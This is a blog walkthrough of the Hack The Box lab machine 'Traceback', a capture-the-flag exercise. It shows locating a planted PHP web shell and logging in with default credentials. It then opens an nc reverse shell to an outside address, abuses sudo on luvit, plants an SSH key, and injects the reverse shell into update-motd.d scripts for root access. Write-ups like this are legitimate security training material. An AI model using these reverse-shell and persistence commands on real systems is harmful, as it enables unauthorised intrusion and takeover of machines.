Open in app

Sign in

Write

Sign in

HTB Traceback — Walkthrough

Vaibhav Joshi
5 min readJun 14, 2021

ENUMERATION

So let’s start enumeration with nmap scan

$ nmap -A 10.10.10.181
PORT   STATE SERVICE    VERSION
22/tcp open  tcpwrapped
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http       Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us

Apache is running on port 80, on visiting there is text on the page saying that there is a backdoor

This site has been owned
I have left a backdoor for all the net. FREE INTERNETZZZ
- Xh4H -

When I checked the source code there was a comment

<!--Some of the best web shells that you might need ;)-->

It reminds me of the webshells by TheBinitGhimire but for confiming I searched this comment on google and found that the machine creator Xh4H has forked the Web-Shells repository by TheBinitGhimire

I made a list containing the names of all shells

alfa3.php
alfav3.0.1.php
andela.php
bloodsecv4.php
by.php
c99ud.php
cmd.php
configkillerionkros.php
jspshell.jsp
mini.php
obfuscated-punknopass.php
punk-nopass.php
punkholic.php
r57.php
smevk.php
wso2.8.5.php

And started a directory brute forcing with this list

# dirsearch.py -u http://10.10.10.181 -w list -e /_|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )Extensions: / | HTTP method: get | Threads: 10 | Wordlist size: 16Error Log: /root/tools/dirsearch/logs/errors-20-04-28_23-54-08.logTarget: http://10.10.10.181[23:54:08] Starting: 
[23:54:10] 200 -    1KB - /smevk.phpTask Completed

Initial Shell

Found that smevk.php was deployed there and with default password admin:admin so I logged in and executed command, found out that current user name is webadmin

To get reverse shell, in the execute command form

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.55 443 >/tmp/f# nc -lvp 443

Privilege Escalation — sysadmin

Inside /home/sysadmin found a note.txt with text

- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

Then on checking sudo permissions found that we have permission to run a binary without password

(sysadmin) NOPASSWD: /home/sysadmin/luvit

As it is luvit, and there is function to run system command, get sysadmin shell, so I created a lua script and executed it with sudo privileges

$ echo 'os.execute("bash")' > test.lua
$ sudo -u sysadmin /home/sysadmin/luvit test.lua

user.txt = daad8c6ce76b80********ba5b5817e5

Privilege Escalation — root

During enumeration I found that there are some writable files inside /etc/update-motd.d/ directory which is a very good sign, a brief idea about the files is that this files will be executed as root user, when a user login into the system. So if there is a file named test, when a user will login or ssh into the box the following command will run a root

$ /bin/sh test

But the problem is that there is cronjob running which replace the files inside /etc/update-motd.d/ with the same files at another location where the files are not writable, So we need to be quick

Also if we put our reverse shell command at the end of any file it will not be executed because none of the scripts are being executed till the last line, and if we completely overwrite the file with out payload like using > in echo then the file will not be executed

I generated a ssh key with ssh-keygen command in my host machine and then inserted the public key inside the server

# ssh-keygen
# cat id_rsa.pub //copy the full text
$ echo "{id_rsa content}" > /home/sysadmin/.ssh/authorized_keys

I wrote my code in /etc/update-motd.d/91-release-upgrade with nano command

after that the file content looks like:

#!/bin/sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.55 443 >/tmp/f          //payload# if the current release is under development there won't be a new one
if [ "$(lsb_release -sd | cut -d' ' -f4)" = "(development" ]; then
    exit 0
fi
if [ -x /usr/lib/ubuntu-release-upgrader/release-upgrade-motd ]; then
    exec /usr/lib/ubuntu-release-upgrader/release-upgrade-motd
fi

Then I started a nc listener on my end and ssh into the box with the private key generated before

# nc -lvp 443# ssh -i id_rsa sysadmin@10.10.10.181

It needs to be quick otherwise out payload file will be replaced by the cronjob

As I falied many times because nano was taking time in it, so I used sed command to come over this, I used the below command

$ sed "/sh/a rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.55 443 >/tmp/f" /etc/update-motd.d/91-release-upgrade > /etc/update-motd.d/50-motd-news

one divding it into parts

  • /sh/a is used so that my code will be inserted after it found the sh keyword, that means in the second line of code, after /bin/sh
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.55 443 >/tmp/f it is reverse shell payload which I am inserting into the code
  • /etc/update-motd.d/91-release-upgrade is one file containing the code
  • /etc/update-motd.d/50-motd-news is another file at same location which will be executed on login, so I overwrite this with the code, because with sed I cannot put the content back in 91-release-upgrade

then ssh into the box and get reverse shell

I also created my python exploit to automate the exploitation, link is here

To get more information about update-motd.d visit here

--

--

Vaibhav Joshi

Written by Vaibhav Joshi

86 Followers

Security Researcher | OSCP

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams